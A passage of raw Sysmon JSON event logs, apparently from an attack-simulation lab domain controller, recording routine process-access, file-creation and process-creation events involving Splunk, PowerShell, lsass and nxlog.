Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.380","SourceProcessGUID":"{E2A3D6B1-11C1-5F25-0000-0010AC970600}","SourceProcessId":"3220","SourceThreadId":"1004","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4844,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.396\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.396","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001069990600}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4845,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.411\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nProcessId: 3216\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_amg341p2.l1d.ps1\r\nCreationUtcTime: 2020-08-01 06:54:57.411","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.411","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001069990600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_amg341p2.l1d.ps1","CreationUtcTime":"2020-08-01 06:54:57.411","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4846,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.443\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.443","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001069990600}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4847,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.443\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.443","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001069990600}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4848,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.521\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.521","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4849,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.912\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-001013AF0600}\r\nProcessId: 3012\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.912","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001013AF0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4850,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-001013AF0600}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001013AF0600}","TargetProcessId":"3012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4851,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-001013AF0600}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001013AF0600}","TargetProcessId":"3012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
